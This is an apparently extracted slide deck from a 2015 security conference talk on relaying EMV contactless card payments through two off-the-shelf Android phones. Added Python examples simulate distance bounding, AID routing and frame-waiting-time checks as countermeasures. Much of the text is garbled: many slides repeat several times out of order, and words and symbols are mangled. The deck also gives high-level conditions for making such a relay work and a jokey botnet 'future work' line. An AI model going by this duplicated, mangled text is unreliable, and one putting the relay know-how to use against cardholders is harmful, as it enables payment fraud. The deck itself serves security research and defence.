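Distance bounding, the first mechanism listed, as an added simulation (Python, not the deck's or the authors' app): a Hancke-Kuhn style rapid bit exchange in which the verifier derives its expected answers from a shared key and clocks each round; any round whose RTT exceeds t_proc + 2·d_max/c fails the bound d ≤ c·(RTT − t_proc)/2 even when the relayed answer is correct. The key, the delays (a 5 cm honest path versus 5 ms each way through a relay) and t_proc are constructed values, and channel latency is simulated rather than measured.

```python
"""Verifier-side distance-bounding check, simulated. Added example for this
deck; not part of the authors' app.

Rapid bit exchange (Hancke-Kuhn style): after swapping nonces, both parties
derive two single-bit response tables from a shared key. The verifier then
sends one challenge bit per round and clocks the round-trip time (RTT). The
prover's distance is bounded by d <= c * (RTT - t_proc) / 2, so forwarding
latency added by a relay shows up as an impossible distance even though every
relayed answer is right. Latencies here are simulated constants, not clocks.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

C_M_PER_S = 299_792_458.0


def response_tables(key: bytes, n_v: bytes, n_p: bytes, rounds: int) -> Tuple[List[int], List[int]]:
    """Derive response tables R0/R1 (one bit per round) from key and nonces."""
    digest = hmac.new(key, n_v + n_p, hashlib.sha256).digest()
    bits = [(byte >> i) & 1 for byte in digest for i in range(8)]
    if 2 * rounds > len(bits):
        raise ValueError("too many rounds for one SHA-256 digest")
    return bits[:rounds], bits[rounds:2 * rounds]


@dataclass
class Prover:
    """Card side: knows the key, answers one bit per challenge."""
    key: bytes
    rounds: int
    r0: List[int] = field(default_factory=list)
    r1: List[int] = field(default_factory=list)

    def start(self, n_v: bytes) -> bytes:
        n_p = secrets.token_bytes(8)
        self.r0, self.r1 = response_tables(self.key, n_v, n_p, self.rounds)
        return n_p

    def answer(self, i: int, challenge_bit: int) -> int:
        return (self.r1 if challenge_bit else self.r0)[i]


@dataclass
class Channel:
    """Simulated verifier<->prover path with a fixed one-way delay."""
    one_way_s: float

    def exchange(self, prover: Prover, i: int, challenge_bit: int,
                 t_proc_s: float) -> Tuple[int, float]:
        rtt = 2 * self.one_way_s + t_proc_s
        return prover.answer(i, challenge_bit), rtt


@dataclass
class Verifier:
    """Reader side: accepts only if every answer is right AND arrives in time."""
    key: bytes
    d_max_m: float            # largest distance the reader will accept
    t_proc_s: float           # prover's nominal per-round processing time
    rounds: int = 32

    def run(self, prover: Prover, channel: Channel) -> Dict[str, object]:
        n_v = secrets.token_bytes(8)
        n_p = prover.start(n_v)
        r0, r1 = response_tables(self.key, n_v, n_p, self.rounds)
        rtt_budget = self.t_proc_s + 2 * self.d_max_m / C_M_PER_S
        wrong = slow = 0
        worst_bound_m = 0.0
        for i in range(self.rounds):
            c = secrets.randbits(1)
            resp, rtt = channel.exchange(prover, i, c, self.t_proc_s)
            if resp != (r1 if c else r0)[i]:
                wrong += 1                      # wrong key or guessed bit
            if rtt > rtt_budget:
                slow += 1                       # too far away for the budget
            worst_bound_m = max(worst_bound_m, C_M_PER_S * (rtt - self.t_proc_s) / 2)
        return {"accepted": wrong == 0 and slow == 0, "wrong": wrong,
                "slow": slow, "distance_bound_m": worst_bound_m}


def demo() -> Dict[str, Dict[str, object]]:
    key = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed key
    verifier = Verifier(key=key, d_max_m=1.0, t_proc_s=1e-6)
    honest = Channel(one_way_s=0.05 / C_M_PER_S)            # card 5 cm away
    relayed = Channel(one_way_s=5e-3)                       # 5 ms each way via relay
    return {
        "honest": verifier.run(Prover(key, verifier.rounds), honest),
        "relayed": verifier.run(Prover(key, verifier.rounds), relayed),
        "wrong_key": verifier.run(Prover(b"\x00" * 16, verifier.rounds), honest),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:10s} {result}")
```

demo() shows the three outcomes: the honest path is accepted, the relayed path is rejected on timing with every answer correct, and a prover with the wrong key is rejected on answers. The simulation assumes a fixed t_proc; on real hardware the processing-time jitter is far larger than the nanoseconds of RF propagation, which is why the slide notes that timing constraints are not enforced in current NFC systems and why distance bounding needs a tightly bounded processing time to work.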


Related Work – On relay attacks

2005–2009: First works built on specific hardware

2010: Nokia mobile phones with NFC capability plus a Java MIDlet app

2012–2013: Relay attacks on Android accessing Secure Elements
A SE securely stores data associated with credit/debit cards
Needs a non-OTS Android device

2014: Active relay attacks with custom hardware and custom Android firmware

Several works studied the delay upon the relay channel

Relay over long distances is feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide


Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are rising

Abuse to interact with cards in their proximity

Conclusions
Review of Android NFC stack
Proof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long


Conclusions (II) – But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
Develop a botnet infrastructure and earn money

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

Acknowledgments
Spanish National Cybersecurity Institute (INCIBE)

University of León under contract X43

HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project


Introduction to NFC (V)

[Taken from 13.56 MHz RFID Proximity Antennas (http://www.nxp.com/documents/application_note/AN78010.pdf)]

Introduction to NFC (VI)


Introduction to NFC (VII)

Ok. So is it secure, right? Right?

If it were so secure, you would not be staring at us ☺

NFC security threats
Eavesdropping

Secure communication as solution

Data modification (i.e., alteration, insertion or destruction)
Feasible in theory (but requires quite advanced RF knowledge)

Relays
Forwarding of wireless communication
Two types: passive (just forwards) or active (forwards and alters the data)

We focus on passive relay attacks


Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
Payment sector is quite interested in this new way of making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at the moment with NFC capabilities

Check http://www.nfcworld.com/nfc-phones-list/

Most of them run Android OS

Research Hypothesis
Can a passive relay attack be performed on contactless payment cards using an Android NFC-capable device?

If so, what are the constraints (if any exist)?


Background (I) – EMV contactless cards

Europay, Mastercard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactions
Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)

Application ID (AID) command


Background (II) – MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?

Amount limit on a single transaction
Up to £20 GBP, 20 €, US$50, 50 CHF, CAD$100 or AUD$100

cof, cof (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)

Sequential contactless payments limited – it asks for the PIN

Protected by the same fraud guarantee as standard transactions (hopefully)


Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)

Mafia frauds – Y. Desmedt (SecuriCom'88)

[Figure: P ⟶ V̄ ⟷ communication link ⟷ P̄ ⟶ V]

Real-time fraud where a fraudulent prover P̄ and verifier V̄ cooperate

Honest prover and verifier: contactless card and Point-of-Sale terminal
Dishonest prover and verifier: two NFC-enabled Android devices


Android and NFC: A Tale of L♥ve (I) – Recap on evolution of Android NFC support

[Figure: timeline of NFC tag technologies and NFC operation modes supported per Android version]
Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight. Modes: software Reader/Writer and Peer-to-peer; hardware Card-emulation
Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B). Modes: software Reader/Writer, Peer-to-peer and Card-emulation; hardware Card-emulation (thanks to Doug Yeager)
Android 4.2 Jelly Bean (API level 17): NfcBarcode
Android 4.4 KitKat (API level 19): software Card-emulation; NfcAdapter.ReaderCallback added

Android and NFC: A Tale of L♥ve (II) – Digging into Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on the built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCI
Open architecture, not focused on a single chip family
Open interface between the NFC Controller and the DH
Standard proposed by the NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV): Resistant Mechanisms

Brief summary of resistant mechanisms

Distance-bounding protocols
    Upper-bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages

Timing constraints
    Not enforced in current NFC-capable systems
    The protocol itself allows timing-extension commands

Physical countermeasures
    Whitelisting/Blacklisting: random UID in HCE mode → unfeasible
    RFID blocking covers
    Physical button/switch activation
    Secondary authentication methods (e.g. on-card fingerprint scanners)


Related Work: On relay attacks

2005-2009: First works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: Relay attacks on Android accessing Secure Elements
    A SE securely stores data associated with credit/debit cards
    Needs a non-OTS Android device
2014: Active relay attacks with custom hardware and custom Android firmware

Several works studied the delay over the relay channel
    Relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide


Conclusions (I)

Security of NFC is based on the physical-proximity assumption
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are on the rise
    Can be abused to interact with cards in their proximity

Conclusions
    Review of the Android NFC stack
    Proof-of-Concept of relay attacks using Android OTS devices
    Threat scenarios introduced
    Virtual pickpocketing attacks may appear before long

Conclusions (II): But then, what the hell can I do? Should I run away?

Conclusions (III)

Future Work
    Develop a botnet infrastructure and earn money
    Timing constraints of Android HCE mode
    Try active relay attacks on EMV contactless cards

Acknowledgments
    Spanish National Cybersecurity Institute (INCIBE)
    University of León under contract X43
    HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project


Introduction to NFC (VI)


Introduction to NFC (VII)

Ok. So is it secure, right? Right?
If it were so secure you would not be staring at us

NFC security threats
    Eavesdropping
        Secure communication as solution
    Data modification (i.e. alteration, insertion or destruction)
        Feasible in theory (but requires quite advanced RF knowledge)
    Relays
        Forwarding of wireless communication
        Two types: passive (just forwards) or active (forwards and alters the data)

We focus on passive relay attacks

Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
    The payment sector is quite interested in this new way of making payments
    500M NFC payment users expected by 2019
    Almost 300 smartphones available at the moment with NFC capabilities
        Check http://www.nfcworld.com/nfc-phones-list/
    Most of them run Android OS

Research Hypothesis
    Can a passive relay attack be performed on contactless payment cards using an Android NFC-capable device?
    If so, what are the constraints (if any exist)?


Background (I): EMV contactless cards

Europay, Mastercard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactions
Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)
Application ID (AID) command

Background (II): MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?

Amount limit on a single transaction
    Up to £20 GBP, 20€, US$50, 50 CHF, CAD$100 or AUD$100
    cof, cof (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
Sequential contactless payments limited: it asks for the PIN
Protected by the same fraud guarantee as standard transactions (hopefully)

Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds: Y. Desmedt (SecuriCom'88)

(figure: P → V̄ ... communication link ... P̄ → V)

Real-time fraud where a fraudulent prover P̄ and verifier V̄ cooperate
    Honest prover and verifier: contactless card and Point-of-Sale terminal
    Dishonest prover and verifier: two NFC-enabled Android devices


Android and NFC: A Tale of L♥ve (I): Recap on evolution of Android NFC support

(timeline figure, reconstructed as a list: Android versions, tag technologies added, and NFC operation modes supported)

Android 2.3.3 Gingerbread (API level 10)
    NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
    Modes: Reader/Writer, Peer-to-peer, Hardware card-emulation

Android CyanogenMod OS 9.1 (thanks to Doug Yeager)
    IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B)
    Modes: adds Software card-emulation

Android 4.2 Jelly Bean (API level 17)
    NfcBarcode

Android 4.4 KitKat (API level 19)
    NfcAdapter.ReaderCallback added
    Modes: Reader/Writer, Peer-to-peer, Hardware card-emulation, Software card-emulation

Android and NFC: A Tale of L♥ve (II): Digging into the Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on the built-in NFC chip)
    libnfc-nxp
    libnfc-nci
NXP dropped in favour of NCI
    Open architecture, not focused on a single chip family
    Open interface between the NFC Controller and the DH (Device Host)
    Standard proposed by the NFC Forum

Android and NFC: A Tale of L♥ve (III): Digging into the Android NFC stack, Reader/Writer mode

Not allowed to be set directly → Android activity
Android NFC service selects apps according to the tag definition in the Manifest file
At low level, libnfc-nci uses a reliable mechanism of queues and message passing: the General Kernel Interface (GKI)
    Makes communication between layers and modules easier

(figure: call path of a transceive, reconstructed) User App → Tag (NFC developer framework) → NfcService.mTagService.transceive → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive → NativeNfcTag.cpp (System NFC Library) → libnfc-nci

Android and NFC: A Tale of L♥ve (IV): Digging into the Android NFC stack, HCE mode

A service must be implemented to process commands and replies
    HostApduService abstract class and processCommandApdu method
AID-based routing service table
    This means you need to declare in advance what AID you handle

Android and NFC: A Tale of L♥ve (V): Digging into the Android NFC stack, Summary

Description                                      Language(s)   Dependency                   OSS
NFC developer framework (com.android.nfc package) Java, C++     API level                    Yes
System NFC library (libnfc-nxp or libnfc-nci)    C/C++         Manufacturer                 Yes
NFC Android kernel driver                        C             Hardware and manufacturer    Yes
NFC firmware (/system/vendor/firmware directory) ARM Thumb     Hardware and manufacturer    No

Some useful links
    https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
    https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
    https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
    https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
    http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications/
    http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
    http://www.datasheet4u.com/PDF/845670/BCM20793S.html
    http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI): Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic
    libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
        Caused by the CRC computation performed by the NFCC
        Overcome if the NFCC is modified
    EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier
    Device in HCE mode
        AID must be known in advance
        Overcome if the device is rooted
    Xposed framework may help to overcome this issue, but needs root permissions
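The AID-based routing of the HCE slide and the "AID must be known in advance" point of Limitation 2, worked through as an added example (not code from the slides, the authors' app or Android itself): a SELECT-by-name parser and a routing table that only hands APDUs to a service once a SELECT for an AID it declared has been matched. The routing replies, the stand-in service and the use of the Visa AID as an undeclared one are assumptions made for this example; 2PAY.SYS.DDF01 is the real EMV PPSE name.

```python
# Added example (not the slides' or Android's own code): SELECT-by-AID parsing and
# an AID-based routing table in the style the HCE slide describes. Status words for
# unrouted APDUs and the MinimalApplet service are assumptions for this example.
SW_SUCCESS = bytes.fromhex("9000")
SW_WRONG_LENGTH = bytes.fromhex("6700")
SW_FILE_NOT_FOUND = bytes.fromhex("6A82")     # assumed reply when no service owns the AID
SW_INS_NOT_SUPPORTED = bytes.fromhex("6D00")

PPSE_AID = "2PAY.SYS.DDF01".encode("ascii").hex()   # 325041592E5359532E4444463031


def parse_select_aid(apdu: bytes):
    """Return the AID of a SELECT-by-name C-APDU (CLA 00, INS A4, P1 04), or None if
    the APDU is some other command. Raises ValueError for a malformed SELECT."""
    if len(apdu) < 5 or apdu[:3] != b"\x00\xA4\x04":
        return None
    lc = apdu[4]
    aid = apdu[5:5 + lc]
    if not 5 <= lc <= 16 or len(aid) != lc:      # ISO/IEC 7816-4 AIDs are 5..16 bytes
        raise ValueError("malformed SELECT: bad Lc")
    return bytes(aid)


class MinimalApplet:
    """Constructed stand-in for a HostApduService: answers SELECT with a minimal FCI
    template (tag 6F wrapping tag 84, the DF name) and rejects everything else."""

    def __init__(self, aid: bytes):
        self.aid = aid

    def process(self, apdu: bytes) -> bytes:
        if parse_select_aid(apdu) == self.aid:
            df_name = b"\x84" + bytes([len(self.aid)]) + self.aid
            return b"\x6F" + bytes([len(df_name)]) + df_name + SW_SUCCESS
        return SW_INS_NOT_SUPPORTED


class AidRouter:
    """AID routing table: a service only ever sees APDUs after a SELECT for an AID it
    declared in advance has been routed to it."""

    def __init__(self):
        self.table = {}
        self.selected = None

    def register(self, aid_hex: str, service) -> None:
        self.table[bytes.fromhex(aid_hex)] = service

    def route(self, apdu: bytes) -> bytes:
        try:
            aid = parse_select_aid(apdu)
        except ValueError:
            return SW_WRONG_LENGTH
        if aid is not None:
            self.selected = self.table.get(aid)
            if self.selected is None:
                return SW_FILE_NOT_FOUND       # AID declared by no service
        if self.selected is None:
            return SW_FILE_NOT_FOUND           # non-SELECT APDU before any selection
        return self.selected.process(apdu)


def select_apdu(aid_hex: str) -> bytes:
    """Build 00 A4 04 00 Lc <AID> 00, the explicit SELECT the slides mention."""
    aid = bytes.fromhex(aid_hex)
    return b"\x00\xA4\x04\x00" + bytes([len(aid)]) + aid + b"\x00"


def demo() -> dict:
    """Route a PPSE SELECT, a follow-up command, an undeclared AID and a malformed
    SELECT through one router; return the responses keyed by case."""
    router = AidRouter()
    router.register(PPSE_AID, MinimalApplet(bytes.fromhex(PPSE_AID)))
    return {
        "declared": router.route(select_apdu(PPSE_AID)),
        # GET PROCESSING OPTIONS reaches the selected service, which does not implement it
        "after_select": router.route(bytes.fromhex("80A80000028300" + "00")),
        # Visa AID used here only as an AID nobody registered
        "undeclared": router.route(select_apdu("A0000000031010")),
        "malformed": router.route(bytes.fromhex("00A4040002315000")),   # Lc = 2
    }
```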

Android and NFC: A Tale of L♥ve (V): Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
    ISO/IEC 14443-4 defines the Frame Waiting Time as
        FWT = 256 · (16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
    FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding Remarks
    Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
    Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice
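The FWT formula above and the timing-constraint point of the Resistant Mechanisms slide, worked through as an added example (not code from the slides or the authors' app): it computes FWT per FWI, the distance bound a round-trip time of that size implies, and the per-exchange check a terminal could apply, including the S(WTX) waiting-time extension the protocol itself allows. The FWI value and the APDU round-trip trace are constructed sample data.

```python
# Added example (not from the slides): the ISO/IEC 14443-4 Frame Waiting Time from
# the formula on the slide, and the round-trip check a terminal could enforce on it.
# SAMPLE_FWI and SAMPLE_TRACE are constructed sample data, not measurements.
from dataclasses import dataclass

FC_HZ = 13.56e6              # carrier frequency fc
FWI_MAX = 14                 # 0 <= FWI <= 14 (FWI 15 is reserved)
WTXM_MAX = 59                # largest multiplier a card may request in S(WTX)
SPEED_OF_LIGHT_M_S = 299_792_458


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2**FWI: how long the reader waits for the card's frame."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def distance_bound_m(rtt_seconds: float) -> float:
    """Loosest distance bound a round trip gives: the signal went there and back."""
    return SPEED_OF_LIGHT_M_S * rtt_seconds / 2


@dataclass
class Exchange:
    """One command/response pair as timed by the terminal (constructed)."""
    name: str
    rtt_seconds: float
    wtxm: int = 1            # 1 = the card requested no S(WTX) extension


def check_exchanges(exchanges, fwi):
    """Classify each exchange against FWT, honouring any waiting-time extension."""
    fwt = fwt_seconds(fwi)
    report = []
    for ex in exchanges:
        if not 1 <= ex.wtxm <= WTXM_MAX:
            raise ValueError(f"{ex.name}: WTXM {ex.wtxm} out of range")
        if ex.rtt_seconds <= fwt:
            verdict = "within FWT"
        elif ex.rtt_seconds <= fwt * ex.wtxm:
            verdict = "within FWT only thanks to S(WTX)"
        else:
            verdict = "timeout"
        report.append((ex.name, verdict))
    return report


# Constructed trace: a card declaring FWI = 4 (FWT is about 4.8 ms) seen over a slow link.
SAMPLE_FWI = 4
SAMPLE_TRACE = [
    Exchange("SELECT 2PAY.SYS.DDF01", rtt_seconds=0.0021),
    Exchange("GET PROCESSING OPTIONS", rtt_seconds=0.040, wtxm=12),
    Exchange("READ RECORD", rtt_seconds=0.250),
]

if __name__ == "__main__":
    for fwi in (0, 4, 8, 14):
        fwt = fwt_seconds(fwi)
        print(f"FWI={fwi:2d}  FWT={fwt * 1e3:9.3f} ms  "
              f"distance bound {distance_bound_m(fwt) / 1e3:12.1f} km")
    for name, verdict in check_exchanges(SAMPLE_TRACE, SAMPLE_FWI):
        print(f"{name:24s} {verdict}")
```

At FWI = 14 the formula gives about 4.95 s, a round trip that bounds the card to roughly 740,000 km, which is why FWT alone cannot act as a distance bound and why the extension mechanism matters to a defender.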



Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

